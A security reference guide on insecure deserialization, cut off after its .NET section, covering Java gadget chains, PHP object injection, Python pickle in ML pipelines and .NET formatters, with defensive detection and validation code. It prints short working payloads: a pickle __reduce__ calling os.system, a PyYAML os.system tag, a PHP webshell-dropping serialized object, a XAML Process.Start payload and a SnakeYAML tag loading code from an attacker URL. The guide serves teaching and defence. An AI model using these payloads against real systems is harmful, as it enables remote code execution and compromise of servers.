Comprehensive Insecure Deserialization Guide

A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 47 research sources.


Table of Contents

  1. Fundamentals
  2. Attack Surface & Entry Points
  3. Java Deserialization
  4. PHP Object Injection
  5. Python Pickle & ML Pipelines
  6. .NET Deserialization
  7. Ruby Marshal & YAML
  8. Node.js Deserialization
  9. YAML & JSON Format Attacks
  10. Gadget Chains Explained
  11. Real-World CVEs & Exploitation Chains
  12. Tools & Automation
  13. Detection & Static Analysis
  14. Prevention & Mitigation
  15. Signature & Gadget Quick Reference

1. Fundamentals

Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way.

Three broad impact classes:

| Class | Description | Canonical Example |
|---|---|---|
| Remote Code Execution | Attacker reaches a native sink (Runtime.exec, os.system, eval, system()) through a gadget chain | Java CommonsCollections → Runtime.exec |
| Object Injection / Logic Abuse | Attacker smuggles an unexpected object type that alters control flow, writes files, or performs SQLi | PHP __destruct → file_put_contents shell upload |
| Denial-of-Service | Recursive object graphs, billion-laughs, hash collision, resource exhaustion | SnakeYAML billion-laughs, Java HashMap hash DoS |

Why it persists: the vulnerability is in data, not code. The sink (readObject, unserialize, pickle.loads, Marshal.load, BinaryFormatter.Deserialize) looks correct in isolation; the bug is the trust boundary around what reaches it. Static analyzers flag the call but cannot reason about whether the bytes arriving were produced by trusted code.

The gadget chain abstraction: RCE is rarely achieved in a single hop. Instead, attackers assemble a graph of “gadgets” — legitimate classes already on the application classpath that, when deserialized in a particular shape, cause method dispatch to cascade until a dangerous sink is reached. The application doesn’t need to ship malicious code; it only needs to load a library that contains usable gadgets.

Key insight: you cannot patch your way out of this. Every patched gadget chain is followed by another built from different links on the same classpath. The only durable fix is to eliminate native deserialization of untrusted input entirely.


2. Attack Surface & Entry Points

Where serialized blobs cross trust boundaries

| Category | Examples |
|---|---|
| HTTP parameters | Base64-encoded state, token, data, session, view, cache params |
| Cookies | Session cookies, remember_me, flash messages, CSRF tokens encoding objects |
| Hidden form fields | ASP.NET __VIEWSTATE, Rails _session_id, JSF javax.faces.ViewState |
| Cache layers | Memcached/Redis blobs, Rails cache store with Marshal, Django pickle sessions |
| Message queues | RabbitMQ, Kafka, ActiveMQ, SQS, ZeroMQ payloads between services |
| RMI / RPC | Java RMI registry, JMX, JNDI, CORBA, DRb |
| File uploads | .ser, .rdb, .pkl, .joblib, .pt, .phar model/checkpoint files |
| WebSockets / IPC | Distributed serving frameworks passing pickle or Marshal over sockets |
| Email headers | X-SerializedObject style custom headers, WSDL SOAP bodies |
| Log ingestion | Log4j-style object injection, Graylog inputs, serialized stack traces |
| Database columns | Opaque BLOB/bytea fields holding serialized objects |

Sink functions by language

Java:     ObjectInputStream.readObject(), XMLDecoder.readObject(),
          XStream.fromXML(), Yaml.load() (SnakeYAML),
          Jackson ObjectMapper with enableDefaultTyping(),
          Kryo.readObject(), Hessian, Castor, Burlap
PHP:      unserialize(), phar:// wrapper (file ops trigger), yaml_parse(),
          Laminas Zend_Serializer, Symfony Serializer XML
Python:   pickle.loads/load, cPickle, joblib.load, torch.load,
          numpy.load(allow_pickle=True), pyyaml yaml.load (unsafe),
          shelve, dill.loads, marshal.loads, jsonpickle.decode
.NET:     BinaryFormatter.Deserialize, SoapFormatter, LosFormatter,
          ObjectStateFormatter, NetDataContractSerializer,
          JavaScriptSerializer (with SimpleTypeResolver),
          Json.NET with TypeNameHandling != None, DataContractSerializer,
          XmlSerializer with arbitrary types
Ruby:     Marshal.load, YAML.load (pre-Psych 4), JSON.parse(create_additions:true),
          Oj.load (default mode), Rails cache store :marshal
Node.js:  node-serialize unserialize(), funcster, serialize-javascript
          (with IIFE), eval-based JSON revivers

Content-type & magic byte fingerprints

| Format | Signature | Notes |
|---|---|---|
| Java serialized | AC ED 00 05 (rO0 base64) | ObjectOutputStream header |
| PHP serialized | O:<num>:"ClassName":<num>:{...} | Also a:, s:, i: primitives |
| Python pickle | 80 04 / 80 05 (proto 4/5) | Starts with PROTO opcode |
| .NET BinaryFormatter | 00 01 00 00 00 FF FF FF FF | SerializationHeaderRecord |
| Ruby Marshal | 04 08 | Major 4, minor 8 |
| ASP.NET ViewState | /wEP, /wEX base64 prefix | Deserialized server-side |
| Phar | <?php __HALT_COMPILER(); manifest | PHP-parsed metadata |
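
The signatures above can be turned into a quick triage helper. The following is a minimal sketch, assuming the check runs on raw request parameters; the function names and labels are hypothetical, and the PHP test is only a loose prefix heuristic.

```python
import base64
import binascii
from typing import Optional

# Binary signatures copied from the fingerprint table.
SIGNATURES = [
    ("java-serialized", bytes.fromhex("ACED0005")),
    (".net-binaryformatter", bytes.fromhex("0001000000FFFFFFFF")),
    ("ruby-marshal", bytes.fromhex("0408")),
    ("python-pickle-proto4", bytes.fromhex("8004")),
    ("python-pickle-proto5", bytes.fromhex("8005")),
]


def fingerprint(blob: bytes) -> Optional[str]:
    """Return a format label if blob starts with a known signature, else None."""
    for label, magic in SIGNATURES:
        if blob.startswith(magic):
            return label
    # PHP objects are textual: O:<len>:"ClassName":...
    if blob.startswith(b"O:") and b':"' in blob[:16]:
        return "php-serialized-object"
    return None


def fingerprint_param(value: str) -> Optional[str]:
    """Check a request parameter both raw and after strict base64 decoding."""
    hit = fingerprint(value.encode("utf-8", "surrogateescape"))
    if hit:
        return hit
    try:
        decoded = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return fingerprint(decoded)
```

A parameter such as rO0ABXNy decodes to the Java stream header and is labelled accordingly. A match only says the bytes look like a serialized object; it says nothing about whether the server actually deserializes them.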

3. Java Deserialization

The core primitive

Any class implementing java.io.Serializable can be reconstructed by ObjectInputStream.readObject(). A class may define a private readObject(ObjectInputStream in) method that is invoked during deserialization — this is where custom logic runs, and it is the primary entry ramp for gadget chains.

ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject();   // attacker-controlled byte stream

The default readObject will happily deserialize any class on the classpath that implements Serializable. No type filter applies unless one is configured explicitly (JEP 290’s ObjectInputFilter, available since Java 9 and backported to 8u121). The “expected type” cast ((User) ois.readObject()) happens after the object graph is fully reconstructed and all side effects have fired.

Classic sink entry points

| Sink | Library | Notes |
|---|---|---|
| ObjectInputStream.readObject | JDK core | Foundation of all classic Java deserialization bugs |
| XMLDecoder.readObject | java.beans | Pure XML RCE; constructor chains via <object class=...> |
| XStream.fromXML | XStream | Whitelist-by-default only since v1.4.18 |
| Yaml.load | SnakeYAML (<2.0) | Instantiates arbitrary classes from !! tags |
| ObjectMapper.readValue + enableDefaultTyping | Jackson | Polymorphic deserialization via @class hints |
| Kryo.readObject / readClassAndObject | Kryo | Default config registers arbitrary classes |
| Hessian.getInputStream | Hessian/Burlap | Used in older Spring Remoting, Caucho |
| JNDI lookup | JNDI/LDAP/RMI | Log4Shell’s cousin: remote class loading |

Gadget chain anatomy (CommonsCollections1)

The canonical chain, dissected from ysoserial’s CommonsCollections1.java, illustrates the building blocks seen in almost every Java chain:

  1. Entry gadget (readObject trigger). sun.reflect.annotation.AnnotationInvocationHandler has a readObject method that calls memberValues.entrySet(). If memberValues is a dynamic Proxy backed by another AnnotationInvocationHandler, entrySet() routes through InvocationHandler.invoke().
  2. Bridge gadget (method dispatch). The inner AnnotationInvocationHandler.invoke() calls memberValues.get(name). When memberValues is a LazyMap, get() invokes the map’s factory.transform(key) for missing keys.
  3. Transform chain (ChainedTransformer). A ChainedTransformer pipes the initial input through an array of Transformer instances, each feeding the next:
    • ConstantTransformer(Runtime.class) — returns the Runtime class object
    • InvokerTransformer("getMethod", ..., {"getRuntime", new Class[0]}) — reflectively fetches the getRuntime method
    • InvokerTransformer("invoke", ..., {null, new Object[0]}) — invokes it, returning a Runtime instance
    • InvokerTransformer("exec", ..., execArgs) — finally calls Runtime.exec(cmd)

The sink is reached not by any single class being malicious, but by abusing reflection primitives exposed in a widely-used utility library.
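
To make the dispatch cascade concrete, here is a toy Python model of the same building blocks. It is a sketch only: the classes borrow the commons-collections names for readability but are not that library's code, and a harmless string method stands in for Runtime.exec.

```python
class ConstantTransformer:
    """Ignores its input and returns a fixed value."""
    def __init__(self, value):
        self.value = value

    def transform(self, _input):
        return self.value


class InvokerTransformer:
    """Calls a named method on its input: the reflection primitive."""
    def __init__(self, method_name, args=()):
        self.method_name = method_name
        self.args = args

    def transform(self, target):
        return getattr(target, self.method_name)(*self.args)


class ChainedTransformer:
    """Feeds the output of each transformer into the next."""
    def __init__(self, transformers):
        self.transformers = transformers

    def transform(self, value):
        for t in self.transformers:
            value = t.transform(value)
        return value


class LazyMap(dict):
    """Computes missing values by calling factory.transform(key)."""
    def __init__(self, factory):
        super().__init__()
        self.factory = factory

    def __missing__(self, key):
        value = self.factory.transform(key)
        self[key] = value
        return value


# Harmless stand-in for the exec sink: string methods only.
chain = ChainedTransformer([
    ConstantTransformer("sink reached"),
    InvokerTransformer("upper"),
    InvokerTransformer("replace", ("SINK", "HARMLESS SINK")),
])
lazy = LazyMap(chain)
result = lazy["any missing key"]   # an ordinary-looking lookup drives the whole chain
```

None of the four classes is dangerous on its own. The behaviour comes entirely from how the object graph is wired, which is the part an attacker controls in a serialized stream.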

Why patching individual gadgets fails

The AnnotationInvocationHandler entry was patched in JDK 8u72 — memberValues must now be a LinkedHashMap. But LazyMap, InvokerTransformer, and ChainedTransformer live in commons-collections and are not part of the JDK. CommonsCollections5 reused the same backend chain but substituted a new entry ramp (BadAttributeValueExpException.readObject calling toString() on an arbitrary object). The backend survived; only the front door changed.

This is the defining pattern of Java deserialization defense: you cannot remove the gadgets (they’re in third-party jars), you cannot remove the sink (it’s in the JDK), and every patched entry is followed by another discovered entry reusing the same backend.

Well-known gadget chain families (ysoserial)

| Chain | Trigger | Backend | Requires |
|---|---|---|---|
| CommonsCollections1 | AnnotationInvocationHandler.readObject | LazyMap + ChainedTransformer | commons-collections 3.1, JDK ≤ 8u71 |
| CommonsCollections2 | PriorityQueue.readObject → compare | TransformingComparator | commons-collections4 4.0 |
| CommonsCollections5 | BadAttributeValueExpException.readObject → toString | LazyMap | commons-collections 3.1, any JDK |
| CommonsCollections6 | HashSet.readObject → hashCode | LazyMap | commons-collections 3.1, any JDK |
| CommonsBeanutils1 | PriorityQueue → BeanComparator | PropertyUtils.getProperty → reflection | commons-beanutils |
| Groovy1 | ConvertedClosure.invokeMethod | Closure("execute") | Groovy ≤ 2.4.3 |
| Spring1, Spring2 | ObjectFactory proxy chains | JDK only + spring-core | Older Spring |
| Hibernate1, Hibernate2 | ComponentType.getPropertyValue | JDK reflection | Hibernate |
| JRMPClient / JRMPListener | RMI remote class loading | Outbound JRMP callback | Network egress |
| URLDNS | HashMap.readObject → URL.hashCode | DNS lookup | Useful as blind probe (no RCE) |
| ROME, Click1, Clojure, JBossInterceptors1, C3P0, MozillaRhino1, Myfaces1, Wicket1 | Various | Various | Application-specific |

SnakeYAML (CVE-2022-1471)

Before SnakeYAML 2.0, Yaml.load() was effectively equivalent to calling ObjectInputStream.readObject for any class on the classpath. YAML tags like !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker/"]]]] could instantiate a ScriptEngineManager pointed at a remote META-INF/services file, loading arbitrary code via JAR SPI. The maintainers initially declined to change defaults, arguing documentation was sufficient — eight CVEs later, 2.0 finally made SafeConstructor the default.

Jackson polymorphic deserialization

Jackson is safe when deserializing fixed types. It becomes dangerous when ObjectMapper.enableDefaultTyping() has been called or classes use @JsonTypeInfo(use = Id.CLASS). The JSON then carries a @class (or @type) hint telling Jackson which concrete class to instantiate, converting a JSON endpoint into an arbitrary gadget instantiation primitive. Jackson’s maintainers keep a blocklist of known gadget classes (SubTypeValidator), but it has been bypassed repeatedly.


4. PHP Object Injection

The unserialize() primitive

PHP’s serialize()/unserialize() encode the class name, property names, and property values of any object. On deserialization, PHP instantiates the named class with the encoded property values directly assigned — the constructor is not invoked. Instead, specific “magic methods” fire automatically:

| Magic Method | When It Fires |
|---|---|
| __wakeup() | Immediately after unserialization |
| __destruct() | When the object is garbage collected (end of request) |
| __toString() | When the object is cast to string (comparisons, echo, string concat) |
| __call() | When an undefined method is invoked |
| __get() / __set() | When undefined properties are accessed |
| __invoke() | When the object is called as a function |
| __unserialize() (PHP 7.4+) | Replaces __wakeup if defined |

Serialized string format

O:12:"LoggingClass":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:20:"<?php evilCode(); ?>";}
  • O:12:"LoggingClass" — object of class LoggingClass (name length 12)
  • 2:{...} — two properties
  • s:8:"filename" — string key of length 8
  • s:9:"shell.php" — string value of length 9
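
The length prefixes are the part that most often trips people up when reading or hand-editing these strings. As a minimal sketch (helper names are hypothetical, and only string-valued public properties are handled), the example string can be rebuilt like this:

```python
def php_str(value: str) -> str:
    """Encode a PHP string; the length prefix counts bytes, not characters."""
    return 's:%d:"%s";' % (len(value.encode("utf-8")), value)


def php_object(class_name: str, props: dict) -> str:
    """Encode an object whose public properties are all strings."""
    body = "".join(php_str(k) + php_str(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (
        len(class_name.encode("utf-8")), class_name, len(props), body)


encoded = php_object("LoggingClass", {
    "filename": "shell.php",
    "content": "<?php evilCode(); ?>",
})
```

The result is byte-for-byte the string shown above. Because the prefix counts bytes, a multi-byte character such as é contributes 2 to the length, which matters when a payload is edited by hand.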

Property-Oriented Programming (POP) chains

Like Java gadget chains, but chained through PHP magic methods and method calls in class __destruct / __wakeup / __toString hooks. The Sonar example illustrates the minimal case — a LoggingClass whose destructor writes $this->content to $this->filename. An attacker serializes an instance with filename = "shell.php" and content = "<?php system($_GET[0]); ?>", and the destructor drops a webshell at request end.

Real POP chains are longer. Typical primitives:

  • A destructor that calls $this->obj->method() where $this->obj is another attacker-chosen class
  • A __toString that builds a SQL query or file path from properties
  • A __wakeup that calls eval, include, or file_put_contents on serialized properties
  • A __call that forwards to call_user_func_array($this->callback, $this->args)

PrestaShop, Drupal (CVE-2019-6340), Joomla, Magento, WordPress core, Pydio, phpBB, and SuiteCRM all had disclosed POP chains reaching RCE.

Phar deserialization (pre-PHP 8)

A subtle variant: PHP’s phar:// stream wrapper parses PHAR metadata via unserialize() when any file operation (including file_exists, filesize, is_dir) touches a PHAR file path. An attacker who can:

  1. Upload a file of any extension containing PHAR metadata (the PHAR format tolerates arbitrary headers — JPEG EXIF, GIF comments, etc.)
  2. Trigger a file operation on phar://uploads/avatar.jpg/foo

…reaches unserialize without ever calling it directly. The avatar upload path becomes an RCE. PHP 8.0 removed implicit metadata unserialization; earlier versions remain exposed.
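
Both preconditions can be screened for cheaply. The sketch below is a heuristic under stated assumptions rather than a complete defence: it looks for the stub marker of the native PHAR format and for the phar:// scheme in user-supplied paths, and it would not catch tar- or zip-based PHAR archives. The function names are hypothetical.

```python
PHAR_MARKER = b"__HALT_COMPILER();"


def looks_like_phar(data: bytes) -> bool:
    """True if the PHAR stub marker appears anywhere in the uploaded bytes."""
    return PHAR_MARKER in data


def uses_phar_wrapper(path: str) -> bool:
    """True if a user-supplied path selects the phar:// stream wrapper."""
    return path.strip().lower().startswith("phar://")
```

An upload pipeline might reject files where looks_like_phar is true regardless of extension, and a path-handling layer might refuse any input for which uses_phar_wrapper is true before it reaches file_exists or similar calls.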

Common PHP deserialization entry points

  • Laravel cookie encryption (when APP_KEY leaks, serialized payloads pass integrity)
  • WooCommerce and WordPress meta fields stored as serialized PHP
  • Yii restoreGET, CodeIgniter session library (with encryption disabled)
  • Symfony Cookie / State components in older versions
  • Legacy Zend Framework Zend_Serializer

5. Python Pickle & ML Pipelines

Pickle is a stack VM, not a data format

pickle.loads() executes a small stack-based virtual machine. One of its opcodes, REDUCE, pops a callable and an argument tuple from the stack and calls them. Any object that defines __reduce__() returning (callable, args) becomes a function call when loaded:

import os
import pickle

class P:
    def __reduce__(self):
        return (os.system, ("id",))   # (callable, args) pair that REDUCE calls on load
pickle.dumps(P())   # -> bytes that call os.system("id") on load

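pickle.loads applies no blocklist and no sandbox, and nothing intercepts the call unless the application subclasses pickle.Unpickler and overrides find_class to restrict which globals may be resolved. The Python docs warn about this in a prominent warning box that approximately nobody reads because the code that loads pickle files is written by ML engineers, not security engineers.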
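
One partial mitigation documented in the Python standard library is to subclass pickle.Unpickler and override find_class, so that every global lookup passes through an allowlist. The sketch below follows that documented pattern; the allowlist contents are an assumption chosen for illustration, and this narrows the attack surface rather than making pickle safe for untrusted input.

```python
import builtins
import io
import pickle

# Assumed allowlist: a handful of harmless builtins.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only allowlisted builtins; refuse every other global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but every global lookup goes through find_class."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

With this in place, restricted_loads(pickle.dumps([1, 2, range(3)])) round-trips, while a stream that references any other callable raises pickle.UnpicklingError before the REDUCE step can call it.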

The ML pipeline problem

Every ML tutorial ends with pickle.dump(model, f) / pickle.load(f). Higher-level libraries hide pickle under innocuous names:

| Function | Actually Calls |
|---|---|
| joblib.load(path) | pickle.load |
| torch.load(path) (pre-2.6 default) | pickle.load over tensor data |
| numpy.load(path, allow_pickle=True) | pickle.load |
| dill.load | pickle with extra object support |
| cloudpickle.load | pickle with closure support |
| HuggingFace transformers older models | pickle under the hood |
| ZeroMQ recv_pyobj() | pickle.loads on wire bytes |

A code reviewer sees joblib.load(model_path) and approves it. The reviewer does not ask where model_path came from. In a typical pipeline the file was downloaded by a training service, pushed to S3, cached by a registry, and finally loaded by inference — the chain of custody is invisible at the load site.

CVE-2025-32444 (vLLM, CVSS 10.0)

vLLM’s Mooncake integration for distributed KV-cache transfer called recv_pyobj() on ZeroMQ sockets bound to 0.0.0.0. Any host on the network could ship a pickle payload and get RCE. The code looked correct — ZMQ is a legitimate IPC mechanism and recv_pyobj is a legitimate API. The bug is that “structured message between trusted workers” silently became “unauthenticated pickle deserialization endpoint.”

LightLLM (CVE-2026-26220)

Same vulnerability class, WebSocket-based. The prefill-decode disaggregation system deserialized incoming binary frames with pickle.loads(). A nonce-based auth check existed but the default nonce was an empty string — falsy in Python, so the check was skipped. The server explicitly refused to bind to localhost, guaranteeing network exposure.

data = await websocket.receive_bytes()
obj = pickle.loads(data)   # untrusted WebSocket binary frame

There was no reason to use pickle for this — the payload was worker registration metadata (strings, ints, dicts). JSON or MessagePack would have worked fine. Pickle was the path of least resistance in Python and nobody thought about it.
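
A data-only alternative might look like the sketch below. The field names and schema are hypothetical (the source only says the payload was strings, ints, and dicts); the point is that JSON decoding plus a fixed schema never instantiates attacker-chosen types.

```python
import json

# Hypothetical registration schema: field name -> required Python type.
ALLOWED_FIELDS = {"worker_id": str, "host": str, "port": int, "tags": list}


def parse_registration(frame: bytes) -> dict:
    """Decode a registration frame as JSON and enforce a fixed schema."""
    try:
        msg = json.loads(frame.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("frame is not valid UTF-8 JSON") from exc
    if not isinstance(msg, dict) or set(msg) != set(ALLOWED_FIELDS):
        raise ValueError("unexpected message shape")
    for field, expected in ALLOWED_FIELDS.items():
        # bool is a subclass of int in Python, so it is rejected explicitly.
        if not isinstance(msg[field], expected) or isinstance(msg[field], bool):
            raise ValueError(f"field {field!r} has the wrong type")
    if not 0 < msg["port"] < 65536:
        raise ValueError("port out of range")
    if not all(isinstance(t, str) for t in msg["tags"]):
        raise ValueError("tags must be strings")
    return msg
```

A pickle payload sent to this parser fails at the UTF-8 or JSON decoding step and is rejected as malformed input instead of being executed.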

PickleScan is fundamentally fragile

Picklescan (used by HuggingFace) parses pickle bytecode and matches against a blocklist of dangerous imports. The problem is architectural: pickle is Turing-complete, and parsing divergence between picklescan and PyTorch creates bypass primitives:

  • ZIP flag bit flipping (Sonatype) — PyTorch’s ZIP reader accepts flipped general-purpose bit flags that picklescan silently skips.
  • Subclass imports (JFrog) — using a subclass of a blocklisted module downgrades picklescan’s “Dangerous” verdict to “Suspicious” while still executing fine.
  • Non-standard file extensions — loader accepts it, scanner ignores it.
  • Gadget diversity — academic research (PickleBall / Brown University CCS 2025) identified 133 exploitable function gadgets across stdlib and common ML deps, achieving near-100% scanner bypass.

Even the best-performing scanner in the PickleBall study let 89% of gadgets through. This is not fixable within the current approach.
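
The blocklist approach can be illustrated with a deliberately naive scanner built on the standard pickletools module. This is a sketch, not picklescan's implementation: the blocklist entries are an assumption, and the STACK_GLOBAL handling is a simple heuristic that takes the last two strings pushed.

```python
import base64
import pickle
import pickletools

# Assumed blocklist of (module, name) pairs.
BLOCKLIST = {("os", "system"), ("posix", "system"), ("nt", "system"),
             ("builtins", "eval"), ("builtins", "exec")}


def imported_globals(data: bytes) -> set:
    """Walk the opcode stream without executing it; collect (module, name) pairs."""
    found, strings = set(), []
    for opcode, arg, _pos in pickletools.genops(data):
        if isinstance(arg, str):
            strings.append(arg)
        if opcode.name == "GLOBAL":                 # protocols 0-3: "module name"
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.add((strings[-2], strings[-1]))   # heuristic: last two strings pushed
    return found


class Harmless:
    def __reduce__(self):
        # Stand-in payload: a benign callable that is not on the blocklist.
        return (base64.b64encode, (b"x",))


seen = imported_globals(pickle.dumps(Harmless()))
verdict = "dangerous" if seen & BLOCKLIST else "clean"
```

The scanner reports the stream as clean even though loading it calls a function chosen by whoever produced the bytes. Any callable missing from the blocklist passes in the same way, which is why gadget diversity defeats this design.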

torch.load: incomplete migration

Before PyTorch 1.13, torch.load(path) unpickled the entire checkpoint with no restrictions. Version 1.13 added the weights_only=True option; 2.6 finally changed the default. But the installed base of unsafe patterns is enormous: old tutorials, copy-pasted notebooks, and vendor scripts that pin PyTorch to earlier versions still exist in production.

Rule for review: torch.load() without weights_only=True is a finding unless the checkpoint source is fully trusted internal infrastructure with integrity verification.
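
The review rule lends itself to a simple automated check. The sketch below uses the standard ast module to flag torch.load calls that do not pass a literal weights_only=True. It assumes the module is referenced as torch, so aliased imports such as from torch import load would be missed.

```python
import ast


def find_unsafe_torch_load(source: str) -> list:
    """Return line numbers of torch.load(...) calls lacking weights_only=True."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_torch_load = (
            isinstance(func, ast.Attribute) and func.attr == "load"
            and isinstance(func.value, ast.Name) and func.value.id == "torch"
        )
        if not is_torch_load:
            continue
        safe = any(
            kw.arg == "weights_only"
            and isinstance(kw.value, ast.Constant) and kw.value.value is True
            for kw in node.keywords
        )
        if not safe:
            findings.append(node.lineno)
    return sorted(findings)
```

Because the check works on source text, it runs without PyTorch installed and can be dropped into a pre-commit hook or CI step.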

Supply-chain vector

Model weights are distributed as files. A 2025 Brown University study found roughly half of popular HuggingFace repositories still contain pickle-backed models, including releases from Meta, Google, Microsoft, NVIDIA, and Intel. Attack patterns:

  • Compromised account: push new weights, every downstream pull runs the payload
  • Typosquatting: bert-base-uncased vs bert_base_uncased
  • Malicious fine-tunes: functional model with payload in serialization wrapper
  • Tensor steganography: hiding callable references in weight perturbations small enough not to affect accuracy

PyYAML’s yaml.load

In PyYAML 5.1 through 5.4, yaml.load(data) without an explicit Loader emitted a warning and fell back to FullLoader, which is meant to disallow arbitrary Python object construction; since PyYAML 6.0 the Loader argument is required. But enormous amounts of legacy code pass Loader=yaml.Loader (the unsafe loader) or use pre-5.1 versions where the default was unsafe. The canonical payload:

!!python/object/apply:os.system ["id"]

Docling RCE (CVE-2026-24009) — a shadow vulnerability introduced into Docling via an unpinned PyYAML version that regressed to accepting arbitrary tags in one code path. The fix was to switch to yaml.safe_load unconditionally.


6. .NET Deserialization

The dangerous formatters

.NET ships with multiple serialization APIs; some are safe, several are explicitly marked insecure:

| Formatter | Status | Notes |
|---|---|---|
| BinaryFormatter | Insecure | Microsoft: “cannot be made secure”; obsoleted in .NET 5+ |
| SoapFormatter | Insecure | Same type-loading model as BinaryFormatter |
| NetDataContractSerializer | Insecure | Preserves .NET types, loads arbitrary types |
| ObjectStateFormatter | Insecure | ASP.NET ViewState backend |
| LosFormatter | Insecure | Legacy ASP.NET |
| JavaScriptSerializer with SimpleTypeResolver | Insecure | Allows __type hints |
| Json.NET with TypeNameHandling != None | Dangerous | $type property instantiates arbitrary classes |
| XmlSerializer with unrestricted types | Dangerous | Requires declared types at compile time; safer if constrained |
| DataContractSerializer | Safer | Known-types list enforced |
| System.Text.Json | Safe (default) | No polymorphic default |

Microsoft’s official guidance: “BinaryFormatter is insecure and can’t be made secure.” Period. There is no allowlist configuration that makes it safe against untrusted input.

Sink patterns

// Classic vulnerable pattern
var fmt = new BinaryFormatter();
var obj = fmt.Deserialize(request.InputStream);   // RCE

// Json.NET danger
var settings = new JsonSerializerSettings {
    TypeNameHandling = TypeNameHandling.All   // or Objects/Arrays
};
var obj = JsonConvert.DeserializeObject<object>(json, settings);

Known .NET RCE gadget families (ysoserial.net)

| Gadget | Works Against | Notes |
|---|---|---|
| TypeConfuseDelegate | BinaryFormatter, LosFormatter, ObjectStateFormatter, NetDataContractSerializer | Sorts a list with a MulticastDelegate confused into calling Process.Start |
| ActivitySurrogateSelector | BinaryFormatter, SoapFormatter | Abuses surrogate selector to compile and run C# at deserialization time |
| ActivitySurrogateSelectorFromFile | Same | Variant that loads an assembly from disk |
| WindowsIdentity | BinaryFormatter, NetDataContractSerializer | Uses WindowsIdentity deserialization callback |
| RolePrincipal | Same | Security principal gadget |
| DataSet | BinaryFormatter, SoapFormatter, XmlSerializer with DataSet | System.Data.DataSet XML type confusion |
| SessionSecurityToken | Json.NET, NetDataContractSerializer | WIF token gadget |
| ObjRef (TransparentProxy) | Remoting | .NET Remoting cross-AppDomain trick |
| TextFormattingRunProperties | Json.NET | XAML-embedded ObjectDataProvider reach to Process.Start |
| PSObject | BinaryFormatter | PowerShell object gadget |

XAML ObjectDataProvider — the universal .NET gadget

The System.Windows.Data.ObjectDataProvider class takes a target type, a method name, and method parameters, and invokes them. Any formatter that can reach XAML parsing (directly or via TextFormattingRunProperties, via XamlReader.Parse, or via Json.NET’s XAML types) can achieve RCE with a single object. It’s the .NET equivalent of InvokerTransformer.

<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
                    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
                    xmlns:s="clr-namespace:System;assembly=mscorlib"
                    xmlns:c="clr-namespace:System.Diagnostics;assembly=system">
  <ObjectDataProvider x:Key="x" ObjectType="{x:Type c:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <s:String>cmd.exe</s:String>
      <s:String>/c calc</s:String>
    </ObjectDataProvider.MethodParameters>
  </ObjectDataProvider>
</ResourceDictionary>

ASP.NET ViewState

ViewState is a base64-encoded blob sent in a hidden __VIEWSTATE form field carrying page control state. It is deserialized server-side by ObjectStateFormatter. Protection relies on <machineKey> HMAC validation (when enabled) and encryption. Leak or brute-force of machineKey turns ViewState into an unauthenticated RCE sink — ysoserial.net’s TextFormattingRunProperties gadget is the canonical payload.
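
The dependence on the key can be shown with a generic MAC-then-deserialize model. This is a sketch of the pattern only, not ASP.NET's actual ViewState wire format; the function names and the choice of HMAC-SHA256 are assumptions for illustration.

```python
import hashlib
import hmac

MAC_LEN = hashlib.sha256().digest_size   # 32 bytes


def protect(state: bytes, key: bytes) -> bytes:
    """Append an HMAC-SHA256 tag to the serialized state."""
    return state + hmac.new(key, state, hashlib.sha256).digest()


def open_state(blob: bytes, key: bytes) -> bytes:
    """Return the state only if its tag verifies; never parse unverified bytes."""
    if len(blob) < MAC_LEN:
        raise ValueError("blob too short")
    state, tag = blob[:-MAC_LEN], blob[-MAC_LEN:]
    expected = hmac.new(key, state, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC check failed")
    return state   # only now would it be handed to a deserializer
```

Tampering without the key fails the comparison, but anyone holding the key can call protect on an arbitrary payload and have it accepted. The MAC proves possession of the key and nothing else, which is why a leaked machineKey is equivalent to deserialization of untrusted input.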

This is exactly the attack surface behind the SharePoint ToolShell campaign (CVE-2025-53770) and the related “replay-style” attack, CVE-2021-27076. A custom webshell parses parameters from __VIEWSTATE, enabling insecure deserialization against on-prem SharePoint. Over 4,600 compromise attempts against 300+ organizations were observed in one week of July 2025.

Defensive must-do: rotate ASP.NET machine keys; enable ValidationMode="3.5" and MAC validation; do not disable ViewState MAC.

Notable .NET deserialization CVEs

| CVE | Product | Formatter |
|---|---|---|
| CVE-2020-25258 | Hyland OnBase | BinaryFormatter |
| CVE-2021-27076 | SharePoint (replay-style) | ObjectStateFormatter/ViewState |
| CVE-2021-29508 | Wire (Proto.Actor) | BinaryFormatter |
| CVE-2022-21969 | Exchange Server | BinaryFormatter via MAPI |
| CVE-2023-3513 | Razer Central Service | BinaryFormatter IPC |
| CVE-2023-5914 | CentralSquare | BinaryFormatter |
| CVE-2023-6184 | Third-party ASP.NET app | ViewState |
| CVE-2025-53770 | SharePoint (ToolShell) | ViewState |
| CVE-2026-20963 | SharePoint | Deserialization RCE |
| CVE-2026-26114 | SharePoint | Deserialization RCE |

7. Ruby Marshal & YAML

Marshal.load — a decade of whack-a-mole

